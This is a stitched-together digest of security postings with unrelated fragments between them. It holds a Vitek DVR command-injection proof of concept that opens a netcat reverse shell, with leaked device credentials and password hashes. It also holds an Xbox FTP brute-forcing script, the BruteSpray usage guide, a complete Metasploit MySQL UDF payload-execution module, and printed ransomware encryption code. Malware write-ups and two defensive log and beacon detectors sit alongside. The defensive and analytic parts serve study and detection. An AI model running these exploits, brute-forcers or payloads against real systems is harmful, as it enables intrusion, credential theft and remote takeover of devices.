$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST

200 OK
[...]
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
[...]

[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:52726.
pwd
/opt/www/htdocs/system
whoami
nobody
ls -l /mnt/usb2/
total 4
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
exit
$

-[Login / Password Disclosure]-

curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
[binary config, login and password can be found for admin login and all connected cameras]

Admin l/p
[...]
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

Cameras l/p
[...]
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|

-[Hardcode l/p]-

FTP: TCP/10021
TELNET: TCP/10023

/etc/passwd
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh

-[Korean hardcoded DNS]-

$ cat /etc/resolv.conf
nameserver 168.126.63.1
nameserver 0.0.0.0
nameserver 0.0.0.0
$
$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.

-[Other Information Disclosure]-

curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1

-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L

curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.2.0     0.0.0.0         255.255.255.0   U     0      0        0 eth1
192.168.57.0    0.0.0.0         255.255.255.0   U     0      0        0 eth0
0.0.0.0         192.168.57.1    0.0.0.0         UG    0      0        0 eth0

curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English

[... and more]

[ETX]
```

Source: https://packetstormsecurity.com/files/145534/Vitek-Remote-Code-Execution-Information-Disclosure.html
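As an added example (not part of bashis's advisory), here is a Python check that flags access-log lines matching two request patterns the advisory describes: shell syntax (`${IFS}`, pipes, backticks) in the `dvrcontrol.cgi` query string, and fetches of the files the advisory shows being served without authentication (`menu.env`, `netinfo.dat`, `gw.dat`). It assumes an upstream reverse proxy or IDS logs the DVR's HTTP traffic in Apache/nginx combined format (the device itself does not necessarily log), and the log lines are constructed with documentation IP ranges.

```python
"""Flag access-log lines that match the Vitek DVR request patterns in the advisory.

Added example, not part of the advisory. Assumes combined-format logging by an
upstream proxy or IDS; the sample lines below are constructed.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Files the advisory shows leaking config, credentials and routing with no login.
DISCLOSURE_PATHS = ("/menu.env", "/webviewer/netinfo.dat", "/webviewer/gw.dat")
# Shell syntax the advisory's PoC smuggles through the query string.
SHELL_RE = re.compile(r"\$\{IFS\}|\$IFS|[|;`]")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None when it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line: str) -> List[str]:
    """Return the advisory-derived tags that apply to one log line."""
    rec = parse_line(line)
    if rec is None:
        return ["unparsable"]
    target = unquote(rec["target"])          # %24%7BIFS%7D becomes ${IFS}
    path, _, query = target.partition("?")
    path = path.lower()
    tags: List[str] = []
    if path == "/dvrcontrol.cgi" and SHELL_RE.search(query):
        tags.append("dvrcontrol-shell-injection")
    if path in DISCLOSURE_PATHS:
        tags.append("config-disclosure-fetch")
    return tags


def suspicious_sources(lines: List[str]) -> Dict[str, List[str]]:
    """Group tags by client IP, skipping clean lines and unparsable ones."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for line in lines:
        tags = classify(line)
        rec = parse_line(line)
        if rec and tags:
            hits[rec["ip"]].extend(tags)
    return dict(hits)


# Constructed sample log (RFC 5737 addresses), not traffic from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2017:10:00:01 +0000] '
    '"GET /dvrcontrol.cgi?nc%24%7BIFS%7D192.0.2.10%24%7BIFS%7D31337 HTTP/1.0" 200 12',
    '192.0.2.10 - - [22/Dec/2017:10:00:05 +0000] "GET /menu.env HTTP/1.1" 200 40960',
    '192.0.2.10 - - [22/Dec/2017:10:00:06 +0000] "GET /webviewer/netinfo.dat HTTP/1.1" 200 88',
    '198.51.100.7 - - [22/Dec/2017:10:01:00 +0000] "GET /webviewer/index.html HTTP/1.1" 200 2048',
    '198.51.100.7 - - [22/Dec/2017:10:01:02 +0000] "GET /dvrcontrol.cgi?cmd=status HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, tags in suspicious_sources(SAMPLE_LOG).items():
        print(ip, sorted(set(tags)))
```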
9. XBOX 360 Aurora version 0.6b default credential FTP bruteforcing script.

```python
# Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce
# Date: 20/12/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: http://phoenix.xboxunity.net/#/news
# Tested on: XBOX 360
# GREETZ: Iker Legorreta, #RemoteExecution Team

#!/usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'Daniel Godoy'

import argparse
import sys
from ftplib import FTP

info = '''
XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n
Usage: ./xbox_ftp_brute_forcer.py [options]\n
Options:
-t, --target <hostname/ip> | Target\n
-u, --user <user> | User\n
-w, --wordlist <filename> | Wordlist\n
-h, --help <help> | print help\n
Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt
'''


def help():
    print info
    sys.exit(0)


def check_default_login(target):
    try:
        ftp = FTP(target)
        ftp.login('xboxftp', 'xboxftp')
        ftp.quit()
        print "\n[+] Default login is open."
        print "\n[+] Username : xboxftp"
        print "\n[+] Password : xboxftp\n"
        ftp.quit()
    except:
        pass


def ftp_login(target, username, password):
    try:
        ftp = FTP(target)
        ftp.login(username, password)
        ftp.quit()
        print "\n[*] Credentials have found."
        print "\n[*] Username : {}".format(username)
        print "\n[*] Password : {}".format(password)
        return True
    except:
        return False


def brute_force(target, username, wordlist):
    try:
        wordlist = open(wordlist, "r")
        words = wordlist.readlines()
        for word in words:
            word = word.strip()
            if ftp_login(target, username, word):
                break
    except:
        print "\n[-] There is no such wordlist file. \n"
        sys.exit(0)


parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target")
parser.add_argument("-u", "--username")
parser.add_argument("-w", "--wordlist")
args = parser.parse_args()

if not args.target or not args.username or not args.wordlist:
    help()
    sys.exit(0)

target = args.target
username = args.username
wordlist = args.wordlist

brute_force(target, username, wordlist)
check_default_login(target)
print "\n[-] Brute force finished. \n"
```

Source: https://packetstormsecurity.com/files/145532/XBOX-360-Aurora-0.6b-Default-Credentials-FTP-Bruteforcer.html
10. BruteSpray

Created by: Shane Young/@x90skysn3k && Jacob Robles/@shellfail
Inspired by: Leon Johnson/@sho-luv
Credit to Medusa: JoMo-Kun / Foofus Networks - http://www.foofus.net
Version - 1.6.0

Description

BruteSpray takes nmap GNMAP/XML output and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.

Installation

pip install -r requirements.txt

On Kali:

apt-get install brutespray

Usage

First do an nmap scan with -oG nmap.gnmap or -oX nmap.xml.

Command: python brutespray.py -h
Command: python brutespray.py --file nmap.gnmap
Command: python brutespray.py --file nmap.xml
Command: python brutespray.py --file nmap.xml -i

Examples

Using Custom Wordlists:
python brutespray.py --file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt --threads 5 --hosts 5

Brute-Forcing Specific Services:
python brutespray.py --file nmap.gnmap --service ftp,ssh,telnet --threads 5 --hosts 5

Specific Credentials:
python brutespray.py --file nmap.gnmap -u admin -p password --threads 5 --hosts 5

Continue After Success:
python brutespray.py --file nmap.gnmap --threads 5 --hosts 5 -c

Use Nmap XML Output:
python brutespray.py --file nmap.xml --threads 5 --hosts 5

Interactive Mode:
python brutespray.py --file nmap.xml -i

Supported Services

ssh ftp telnet vnc mssql mysql postgresql rsh imap nntp pcanywhere pop3 rexec rlogin smbnt smtp svn vmauthd snmp

Changelog

v1.6.0 added support for SNMP
v1.5.3 adjustments to wordlists
v1.5.2 change tmp and output directory behavior
v1.5.1 added check for no services
v1.5 added interactive mode
v1.4 added ability to use nmap XML
v1.3 added the ability to stop on success; added the ability to reference custom userlists and passlists; added the ability to specify specific users & passwords

Download: brutespray-master.zip
git clone https://github.com/x90skysn3k/brutespray.git

Source: https://github.com/x90skysn3k/brutespray
  11. https://www.hybrid-analysis.com/sample/5af6c81056efc5768b8c269e81c769d75f39d8e31b4f048616998f0bd552a743?environmentId=100
12. This Metasploit module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL versions 5.5.9 and below, directory write permissions are not enforced, and the MySQL service runs as LocalSystem. NOTE: This Metasploit module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

mysql_udf_payload.rb

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL UDF Payload Execution',
      'Description'    => %q{
        This module creates and enables a custom UDF (user defined function) on the
        target host via the SELECT ... into DUMPFILE method of binary injection. On
        default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
        permissions not enforced, and the MySQL service runs as LocalSystem.

        NOTE: This module will leave a payload executable on the target system when the
        attack is finished, as well as the UDF DLL, and will define or redefine
        sys_eval() and sys_exec() functions.
      },
      'Author'         =>
        [
          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
          'todb', # this Metasploit module
          'h00die' # linux addition
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # Bernardo's work with cmd exec via udf
          [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
        ],
      'Platform'       => ['win', 'linux'],
      'Targets'        =>
        [
          [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
          [ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
    ))

    register_options(
      [
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
      ])
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def login_and_get_sys_exec
    m = mysql_login(username,password,'mysql')
    return if not m
    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec()
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      mysql_add_sys_exec
      @mysql_sys_exec_available = mysql_check_for_sys_exec()
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end
    return m
  end

  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  def exploit
    m = login_and_get_sys_exec()
    if not m
      return
    elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    else
      if @mysql_sys_exec_available
        execute_cmdstager({:linemax => 1500, :nodelete => true})
        handler
      else
        print_status("MySQL function sys_exec() not available")
        return
      end
    end
    disconnect
  end
end
```

Source: https://packetstormsecurity.com/files/145526/Oracle-MySQL-UDF-Payload-Execution.html
13. Although the original creators of the infamous IoT malware Mirai have already been arrested and sent to jail, the variants of the notorious botnet are still in the game due to the availability of its source code on the Internet.

Hackers have widely used the infamous IoT malware to quietly amass an army of unsecured internet-of-things devices, including home and office routers, that could be used at any time by hackers to launch Internet-paralyzing DDoS attacks.

Another variant of Mirai has hit once again, propagating rapidly by exploiting a zero-day vulnerability in a Huawei home router model.

Dubbed Satori (also known as Okiku), the Mirai variant has been targeting Huawei's router model HG532, as Check Point security researchers said they tracked hundreds of thousands of attempts to exploit a vulnerability in the router model in the wild.

Identified initially by Check Point researchers in late November, Satori was found infecting more than 200,000 IP addresses in just 12 hours earlier this month, according to an analysis posted by Chinese security firm 360 Netlab on December 5.

Researchers suspected an unskilled hacker who goes by the name "Nexus Zeta" is exploiting a zero-day remote code execution vulnerability (CVE-2017-17215) in Huawei HG532 devices, according to a new report published Thursday by Check Point.

The vulnerability is due to the fact that the implementation of TR-064 (a technical report standard), an application layer protocol for remote management, in the Huawei devices was exposed on the public Internet through the Universal Plug and Play (UPnP) protocol at port 37215.

Since this vulnerability allowed remote attackers to execute arbitrary commands on the device, attackers were found exploiting this flaw to download and execute the malicious payload on the Huawei routers and upload the Satori bot.

In the Satori attack, each bot is instructed to flood targets with manually crafted UDP or TCP packets. Although the researchers observed a flurry of attacks worldwide against the Huawei HG532 devices, the most targeted countries include the United States, Italy, Germany, and Egypt.

Check Point researchers "discreetly" disclosed the vulnerability to Huawei as soon as their findings were confirmed, and the company confirmed the vulnerability and issued an updated security notice to customers on Friday.

The company also offered some mitigations that could circumvent or prevent the exploit, which included using the built-in firewall function, changing the default credentials of their devices, and deploying a firewall at the carrier side.

Users can also deploy Huawei NGFWs (Next Generation Firewall) or data center firewalls, and upgrade their IPS signature database to the latest IPS_H20011000_2017120100 version released on December 1, 2017, in order to detect and defend against this flaw.

Via thehackernews.com
14. We found a new cryptocurrency-mining bot spreading through Facebook Messenger, which we first observed in South Korea. We named this Digmine based on the moniker (비트코인 채굴기 bot) it was referred to by in a report of recent related incidents in South Korea. We've also seen Digmine spreading in other regions such as Vietnam, Azerbaijan, Ukraine, Philippines, Thailand, and Venezuela. It's not far-off for Digmine to reach other countries given the way it propagates.

Facebook Messenger works across different platforms, but Digmine only affects Facebook Messenger's desktop/web browser (Chrome) version. If the file is opened on other platforms (e.g., mobile), the malware will not work as intended.

Digmine is coded in AutoIt, and sent to would-be victims posing as a video file but is actually an AutoIt executable script. If the user's Facebook account is set to log in automatically, Digmine will manipulate Facebook Messenger in order to send a link to the file to the account's friends. The abuse of Facebook is limited to propagation for now, but it wouldn't be implausible for attackers to hijack the Facebook account itself down the line. This functionality's code is pushed from the command-and-control (C&C) server, which means it can be updated.

A known modus operandi of cryptocurrency-mining botnets, and particularly for Digmine (which mines Monero), is to stay in the victim's system for as long as possible. It also wants to infect as many machines as possible, as this translates to an increased hashrate and potentially more cybercriminal income.

Figure 1: Digmine's attack chain

Figure 2: Link to Digmine sent via Facebook Messenger (top, cropped) and the file pretending to be a video (bottom); original image source: c0nstant (bottom right)

Infection Chain

Digmine is a downloader that will first connect to the C&C server to read its configuration and download multiple components. The initial configuration contains links from which it downloads components, most of which are also hosted on the same C&C server. It saves the downloaded components in the %appdata%\<username> directory.

Figure 3: Configuration for the downloader (top); and the downloaded components (bottom)

Digmine will also perform other routines such as installing a registry autostart mechanism as well as a system infection marker. It will search for and launch Chrome, then load a malicious browser extension that it retrieves from the C&C server. If Chrome is already running, the malware will terminate and relaunch Chrome to ensure the extension is loaded. While extensions can only be loaded and hosted from the Chrome Web Store, the attackers bypassed this by launching Chrome (loaded with the malicious extension) via command line.

Figure 4: Digmine downloader component in the autostart registry entry (top), and a marker indicating the malware has infected the system (bottom)

Figure 5: Currently running Chrome process terminated (top) and relaunching Chrome with parameter to load extension (bottom)

The extension will read its own configuration from the C&C server. It can instruct the extension to either proceed with logging in to Facebook or open a fake page that will play a video. The decoy website that plays the video also serves as part of their C&C structure. This site pretends to be a video streaming site but also holds a lot of the configurations for the malware's components.

Figure 6: Configuration link for the decoy video if a separate routine is set by the configuration from the C&C (top), and screenshot of a fake streaming site used to play video as decoy (bottom)

Figure 7: Initial configuration used by the browser extension

Propagation

The browser extension is responsible for propagation via interaction with Chrome, and by extension, Facebook Messenger. This routine is triggered by conditions available in the configuration file retrieved from the C&C server. If the user has their Facebook account automatically logged in by default, the browser extension is able to interact with their account. It does so by downloading additional code from the C&C server. Digmine's interaction with Facebook could get more functions in the future since it's possible to add more code.

Figure 8: Part of the additional code retrieved from the C&C server, which allows interaction with Facebook

Mining Component

The miner module will be downloaded by codec.exe, which is the miner management component. It will connect to another C&C server to retrieve the miner and its corresponding configuration file. The mining component miner.exe is an iteration of an open-source Monero miner known as XMRig. The miner was reconfigured to execute using the config.json file instead of receiving parameters directly from the command line.

Figure 9: Miner configuration (top) and codec.exe code launching the miner component with config (bottom)

C&C Communication and Protocol

Both the downloader and the mining management component use specific HTTP headers to communicate with the C&C server. When downloading the initial configuration, the malware constructs the following HTTP GET request before sending it to the C&C server:

```http
GET /api/apple/config.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Miner
Window: <Window name of active window>
ScriptName: <filename of malware>
OS: <OS version>
Host: <C&C>
```

Of note is how the malware uses a specific User-Agent called Miner. The server denies access to the initial configuration file if the HTTP request headers are incorrect.

Best Practices

The increasing popularity of cryptocurrency mining is drawing attackers back to the mining botnet business. And like many cybercriminal schemes, numbers are crucial—bigger victim pools equate to potentially bigger profits. The fact that they're piggybacking on popular platforms such as social media to spread their malware is unsurprising. To avoid these types of threats, follow best practices on securing social media accounts: think before you share, be aware of suspicious and unsolicited messages, and enable your account's privacy settings.

We disclosed our findings to Facebook, which promptly removed many of the Digmine-related links from its platform. In Facebook's official statement, "We maintain a number of automated systems to help stop harmful links and files from appearing on Facebook and in Messenger. If we suspect your computer is infected with malware, we will provide you with a free anti-virus scan from our trusted partners. We share tips on how to stay secure and links to these scanners on facebook.com/help."

Indicators of Compromise (IoCs):

Hash detected as TROJ_DIGMINEIN.A (SHA256): beb7274d78c63aa44515fe6bbfd324f49ec2cc0b8650aeb2d6c8ab61a0ae9f1d
Hash detected as BREX_DIGMINEEX.A (SHA256): 5a5b8551a82c57b683f9bd8ba49aefeab3d7c9d299a2d2cb446816cd15d3b3e9
Hash detected as TROJ_DIGMINE.A (SHA256): f7e0398ae1f5a2f48055cf712b08972a1b6eb14579333bf038d37ed862c55909

C&C servers related to Digmine (including subdomains):

Source: http://blog.trendmicro.com/trendlabs-security-intelligence/digmine-cryptocurrency-miner-spreading-via-facebook-messenger/
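As an added example (not code from the Trend Micro write-up), here is a Python check that scores a raw HTTP request on the three traits the write-up attributes to the downloader's configuration beacon: the exact `User-Agent: Miner`, the non-standard `Window`/`ScriptName`/`OS` headers, and the `GET /api/apple/config.php` path. The sample requests are constructed, and the host name is a placeholder rather than a real C&C.

```python
"""Detect the Digmine downloader's configuration beacon in raw HTTP requests.

Added example, not code from the write-up: it checks a raw HTTP/1.x request
for the three traits described there. Sample requests are constructed.
"""
import re
from typing import Dict, List, Tuple

DIGMINE_USER_AGENT = "Miner"                         # from the write-up
DIGMINE_CUSTOM_HEADERS = ("window", "scriptname", "os")
DIGMINE_CONFIG_PATH = "/api/apple/config.php"        # from the write-up


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, path, lowercase-keyed headers).

    Any body after the blank line is ignored; header lines without a colon
    are skipped rather than raising, so a slightly malformed capture still parses.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split(" ")
    if len(parts) < 2:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def digmine_indicators(raw: str) -> List[str]:
    """Return the Digmine traits present in one request (empty list = none).

    Each trait alone is weak (a benign client could call itself "Miner");
    all three together is the exact shape of the downloader's first request.
    """
    method, path, headers = parse_request(raw)
    found: List[str] = []
    if headers.get("user-agent") == DIGMINE_USER_AGENT:
        found.append("user-agent-miner")
    if all(h in headers for h in DIGMINE_CUSTOM_HEADERS):
        found.append("custom-headers-window-scriptname-os")
    if method == "GET" and path.lower() == DIGMINE_CONFIG_PATH:
        found.append("config-php-path")
    return found


def is_digmine_beacon(raw: str) -> bool:
    """True only when every trait of the initial config fetch is present."""
    return len(digmine_indicators(raw)) == 3


# Constructed samples: one shaped like the beacon, one ordinary browser request.
BEACON_SAMPLE = (
    "GET /api/apple/config.php HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent: Miner\r\n"
    "Window: Untitled - Notepad\r\n"      # constructed active-window title
    "ScriptName: video_1234.exe\r\n"     # constructed malware file name
    "OS: WIN_7\r\n"                      # constructed OS string
    "Host: c2.example.invalid\r\n\r\n"   # placeholder, not a real C&C
)
BENIGN_SAMPLE = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1) Chrome/63.0\r\n"
    "Accept: */*\r\n\r\n"
)

if __name__ == "__main__":
    for label, sample in (("beacon", BEACON_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, digmine_indicators(sample), is_digmine_beacon(sample))
```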
15. WEB MONITORING AND TRUST BADGES

Get free trust badges and monitoring for your first 2 domains. Start converting more visitors to paid subscribers.

Blacklisting alerts: Monitor your domain for SPAM blacklisting and safe browsing problems like malware, spyware and trojans. Get notified before you lose your traffic!

SSL monitoring: You'll be alerted if there are any problems with your SSL certificate and get renewal reminders before it expires.

Trust badges: Add the Trustocity badge to your site and improve visitor confidence. Users buy / subscribe more from sites they trust.

Source: https://trustocity.com/
16. Don't give them ideas.
17. Look who's breaking into homes.
  18. Online Malware Analysis Report: https://www.reverse.it/sample/86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f?environmentId=100 Analysis mode: Static and Dynamic Analysis Host Operating System: Windows 7 64 bit Guest Operating System: Windows 7 32 bit Containment: Vmware v12 Firewall/Security Installed: Windows Defender (Static Analysis) Analysis Tools Used: IDA, .NET Reflector (Static Analysis) Analysis screenshots: Yes (Dynamic Analysis) Analysis Tools Used: Process Monitor, Process Explorer (Dynamic Analysis) Analysis screenshots: Yes Introduction Ransomware is a type of malware which usually acts as a trojan horse, the user mistakes it for a legitimate file and when he activates the “program, it begins encrypting files on the computer. when the task is completed it demands a ransom, usually in bitcoins. in most cases you have two options: pay the ransom lose your files for ever surprisingly a lot of people choose to pay the ransom to get their files back, as seen with CryptoLocker back in 2013. Today we will be reviewing a sample I randomly picked up at Here, a pretty good malware collection. My Sample Static review Opening the file in IDA reveals that this malware is written in .NET IDA is unable to make this file readable, expose is imports or exports but before moving on to a .NET decompiler I decide to explore the Strings and Names view. String view seems empty: Names: The strings raise my suspicious since the program does not seem to hide its intentions. This was enough. I headed to the decompiler, I am using the .NET Reflector for this one how ever it is not free, you should use dotPeek. 
The program contains the following structure: Form 1: Fields and Methods: //Fields private Button button; private IContainer components = null; private string computerName = Environment.MachineName.ToString(); private Label label1; private Label label2; private PictureBox pictureBox1; private string userDir = @"C:\Users\"; private string userName = Environment.UserName; //Methods public Form1(); public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes); private void button1_Click(object sender, EvenArgs e); public string CreatePassword(int lenghts); protected override void Dispose(bool disposing); public void encryptDirectory(string location, string password); public void EncryptFile(string file, string password); private void Form_Shown(object sender, EventArgs e); private void Form1_Load(object sender, EventArgs e); private void InitializeComponent(); public void messageCreator(); public void SendPassword(string password); public void startAction(); Form1 constructor: I would be curios why he chose to create the constructor like this: //public Form1() { this.InitializeComponent(); RegistryKet key2 = Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\ if (key2.GetValue("DisableTaskMgr") == null) { key2.Setvalue("DisableTaskMgr","1"); } else { key2.DeleteValue("DisableTaskMgr"); } RegistryKet key - Registry.CurrentUser.CreateSubKey(@"Control Panel\Desktop"); key.SetValue("Wallpaper","0"); key.Close(); key2.Close(); } full registry path - “Software\Microsoft\Windows\CurrentVersion\Policies\System" This constructor disables the task manager and blacks out the wall paper. AES_Encrypt: This was the most interesting function, I will expand on it and explain how Symmetric encryption works. This encryption works with one key, to encrypt a piece of plain text. both of the parties need to know the key. The AES encryption is an iterative algorithm. 
which means we will need the following to construct it:

The key - passwordBytes

CipherMode - ECB (electronic code book) is basically a raw cipher. For each block of input, you encrypt the block and get some output. The problem with this transform is that any resident properties of the plaintext might well show up in the ciphertext – possibly not as clearly – that's what blocks and key schedules are supposed to protect against, but by analyzing the patterns you may be able to deduce properties that you otherwise thought were hidden. CBC mode is short for cipher block chaining. You have an initialization vector which you XOR the first block of plaintext against. You then encrypt that block of plaintext. The next block of plaintext is XOR'd against the last encrypted block before you encrypt this block.

IV or Initialization Vector - since AES is iterative, each encryption block is dependent on the previous block, but the first block does not have a previous block; to solve this problem the IV was born.

Block Size - The plain text will be split into blocks, each of block size. That means that if the block size is 64 bits and the text is 130 bits then you'll get 3 blocks: two blocks with 64 bits of plain text each, and another block with 2 bits of plain text and another 28 padding bits.

Key Size

You can read all about it here: ECB OR CBC, What is a block cipher, Why use IVs

Regarding how AES works, I won't get into it. Let's see what happens in the code. First, the function accepts two parameters: the bytes we will encrypt and the key. It creates a salt. We can also see that it creates a randomly generated key and an IV using the DeriveBytes class. "Rfc2898DeriveBytes is an implementation of PBKDF2. What it does is repeatedly hash the user password along with the salt." The third parameter is the number of iterations. The GetBytes function returns the pseudo-random key for this object.

So the key and the IV are fully randomized based on the size of the key and the block size. Finishing it up with setting the cipher to CBC mode since AES is CBC. So as we can see, this is not just AES encryption: first we use one key to generate a key; from that key we generate two more keys (the key for AES and the IV), and then and only then do we encrypt bytesToBeEncrypted. The function translates the stream to a byte buffer and returns it. Keep in mind, this is not complex. With a proper crypter this lame ass .NET program can bypass most AV detection.

EncryptFile:

public void EncryptFile(string file, string password)
{
    byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
    byte[] bytes = Encoding.UTF8.GetBytes(password);
    bytes = SHA256.Create().ComputeHash(bytes);
    byte[] buffer3 = this.AES_Encrypt(bytesToBeEncrypted, bytes);
    File.WriteAllBytes(file, buffer3);
    File.Move(file, file + "WINDOWS");
}

